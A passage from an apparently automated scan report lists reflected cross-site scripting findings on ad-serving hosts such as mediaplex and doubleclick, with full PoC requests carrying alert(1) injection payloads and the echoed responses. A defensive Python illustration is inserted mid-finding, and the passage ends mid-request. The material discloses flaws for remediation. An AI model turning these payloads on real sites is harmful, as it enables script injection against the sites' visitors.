GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f8c6a0'%3balert(1)//30af109326a HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:15 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5386
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/y;207642206;0-0;0;33078170;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?8c6a0';alert(1)//30af109326ahttp://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=6156764" target="_blank">
...[SNIP]...

3.168. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2cca'%3balert(1)//6164b81c3de was submitted in the mpck parameter. This input was echoed as a2cca';alert(1)//6164b81c3de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a2cca'%3balert(1)//6164b81c3de&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:43 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5383
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
61/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=3602914a2cca';alert(1)//6164b81c3de" target="_blank">
...[SNIP]...

3.169. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c82"-alert(1)-"0bf514e8e3 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a9c82"-alert(1)-"0bf514e8e3&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:41 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5373
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a9c82"-alert(1)-"0bf514e8e3");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a9c82"-alert(1)-"0bf514e8e3");
mpck = "http
...[SNIP]...

3.170. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34070"%3balert(1)//d35023e459b was submitted in the mpvc parameter. This input was echoed as 34070";alert(1)//d35023e459b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f34070"%3balert(1)//d35023e459b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:53 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5379
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/b;207642206;0-0;0;67183576;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?34070";alert(1)//d35023e459b");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/b;207642206;0-0;0;67183576;4307-300/250;33472683/33490561/1;u=****300x250,3
...[SNIP]...

3.171. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de2b7'%3balert(1)//e1aee509765 was submitted in the mpvc parameter. This input was echoed as de2b7';alert(1)//e1aee509765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3fde2b7'%3balert(1)//e1aee509765 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:55 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5379
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/b;207642206;0-0;0;67183576;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?de2b7';alert(1)//e1aee509765http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=3602914" target="_blank">
...[SNIP]...

3.172. http://installer.mpx.theplatform.com/installers/mpxUploader.air [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://installer.mpx.theplatform.com
Path:   /installers/mpxUploader.air

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9107<script>alert(1)</script>2a640559b36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /installers/mpxUploader.airc9107<script>alert(1)</script>2a640559b36 HTTP/1.1
Host: installer.mpx.theplatform.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Length: 1432
Content-Type: text/html; charset=iso-8859-1
Server: Jetty(6.1.19)
Expires: Wed, 05 Oct 2011 19:32:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 05 Oct 2011 19:32:24 GMT
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /installers/mpxUploader.airc9107<script>alert(1)</script>2a640559b36. Reason:
<pre>
...[SNIP]...

3.173. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /pfadx/nbcu.lim.ny/131129433_undefined_weather_

Issue detail

The value of REST URL parameter 3 (the third path segment, 131129433_undefined_weather_) is copied into the response as plain text between tags. The payload 9c3ff<script>alert(1)</script>4fed174e67 was appended to that segment and echoed unmodified inside the <URL> element of the AcudeoWrapper XML body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Although the body is an XML document, it is served with Content-Type: text/html, so a browser that opens this URL directly parses it as HTML and runs the injected script tag. The Referer shows the tag is normally fetched by the flvPlayer.swf Flash player, but nothing prevents an attacker from linking a victim straight to the crafted URL.

Request

GET /pfadx/nbcu.lim.ny/131129433_undefined_weather_9c3ff<script>alert(1)</script>4fed174e67;dcmt=text/html;!category=ny;!category=weather;!category=;site=ny;sect=weather;sub=;pid=undefined;contentid=2148282776;contentgroup=null;env=;tile=16;pt=;pos=16;sz=60x120;ord=444512866 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1819
DCLK_imp: v7;x;242653273;0-0;0;25398738;60/120;42965716/42983503/1;;~aopt=6/0/ff/0;~okv=;dcmt=text/html;!category=ny;!category=weather;!category=;site=ny;sect=weather;sub=;pid=undefined;contentid=2148282776;contentgroup=null;env=;tile=16;pt=;pos=16;sz=60x120;~cs=t
Date: Wed, 05 Oct 2011 18:24:30 GMT

<!-- Template ID = 16798 Template Name = LIM - Acudeo - Tremor US Network - Overlay Version 1.24 -->

<?xml version="1.0" encoding="UTF-8"?>
       <AcudeoWrapper Version="1.24">
        <AdTag AdSystem="Tremo
...[SNIP]...
<URL>http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_9c3ff<script>alert(1)</script>4fed174e67;sz=1x1;dcmt=text/xml;ord=4429482?</URL>
...[SNIP]...

3.174. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the response as plain text between tags. The payload ffca8<script>alert(1)</script>368431c84a6 was submitted in the csid parameter and echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because gw.js is a script resource, confirm the Content-Type of the response that carries the reflection: a payload echoed into a body the browser treats as JavaScript (compare the application/x-javascript resource at the top of this page) is a different injection context and will not execute as an HTML <script> tag.
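The check behind findings 3.172 to 3.174 is the same each time: a probe wrapped in unique markers is placed in a path segment or parameter, and the response is searched for the markers with the tags still intact. The following is an added illustration written for this page, not XSS.CX or Burp code. The two response builders are constructed stand-ins for the Jetty 404 page (3.172) and the AcudeoWrapper body served as text/html (3.173); the browser-encoding function is an approximation of how a browser percent-encodes a path, included because the PoC requests above send < and > raw.

```python
import html
import re
from urllib.parse import quote, unquote

# Added example (not the scanner's code). The response templates below are
# constructed to mirror the Jetty 404 page in 3.172 and the XML wrapper in
# 3.173; they are not captured traffic.


def make_payload(prefix: str, suffix: str) -> str:
    """Wrap the probe in unique markers (the report uses random hex such as
    c9107 ... 2a640559b36) so a genuine echo can be told apart from any
    <script> tag that was already on the page."""
    return f"{prefix}<script>alert(1)</script>{suffix}"


def classify_reflection(body: str, prefix: str, suffix: str) -> str:
    """'raw'        : markers came back with the tags intact, which is what
                      the report calls 'echoed unmodified';
       'neutralized': markers present but the tags are gone (HTML-escaped,
                      percent-encoded or stripped);
       'absent'     : the input was not reflected at all."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "absent"
    return "raw" if "<script>" in m.group(1) else "neutralized"


def renders_as_html(content_type: str) -> bool:
    """A raw reflection only becomes script execution if the browser parses
    the response as HTML. 3.173 returns XML but labels it text/html, which
    is why the <script> inside <URL> would still run."""
    return content_type.split(";")[0].strip().lower() == "text/html"


def unsafe_404(path: str) -> str:
    """Constructed error page in the style of 3.172: the request path is
    interpolated into the message without encoding."""
    return ("<html><head><title>Error 404 NOT_FOUND</title></head>"
            "<body><h2>HTTP ERROR 404</h2>"
            f"<p>Problem accessing {path}. Reason:<pre>NOT_FOUND</pre></p>"
            "</body></html>")


def safe_404(path: str) -> str:
    """The fix: HTML-escape untrusted text before placing it between tags."""
    return unsafe_404(html.escape(path, quote=True))


def ad_wrapper(segment: str) -> str:
    """Constructed stand-in for the AcudeoWrapper body in 3.173: the URL
    path segment is copied into an XML element of a text/html response."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<AcudeoWrapper Version="1.24">'
            f"<URL>http://iv.doubleclick.net/pfadx/nbcu.lim.ny/{segment};sz=1x1</URL>"
            "</AcudeoWrapper>")


def browser_sends(path: str) -> str:
    """Approximation of what a browser puts on the wire for a typed or
    clicked URL: '<', '>', '"' and spaces are percent-encoded, while '/',
    ';', '=', '(' and ')' are left alone. The report's PoC sent the
    characters raw instead."""
    return quote(path, safe="/();=,:@")


def echo_after_decode(wire_path: str) -> str:
    """A server that percent-decodes the path before building the error
    page reflects the raw tags even though the browser encoded them; one
    that echoes the path as received does not."""
    return unsafe_404(unquote(wire_path))


if __name__ == "__main__":
    p, s = "c9107", "2a640559b36"
    path = "/installers/mpxUploader.air" + make_payload(p, s)
    for label, body in (("unsafe 404", unsafe_404(path)),
                        ("escaped 404", safe_404(path)),
                        ("encoded by browser, echoed as-is", unsafe_404(browser_sends(path))),
                        ("encoded by browser, decoded by server", echo_after_decode(browser_sends(path)))):
        print(f"{label:40s} -> {classify_reflection(body, p, s)}")
```

The marker search rather than a plain substring match is what lets the scanner claim "Confidence: Certain": the random prefix and suffix cannot appear by accident, and what sits between them shows exactly which characters survived the round trip.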

Request

GET /gateway/gw.js?csid=K05540ffca8<script>alert(1)</script>368431c84a6 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cb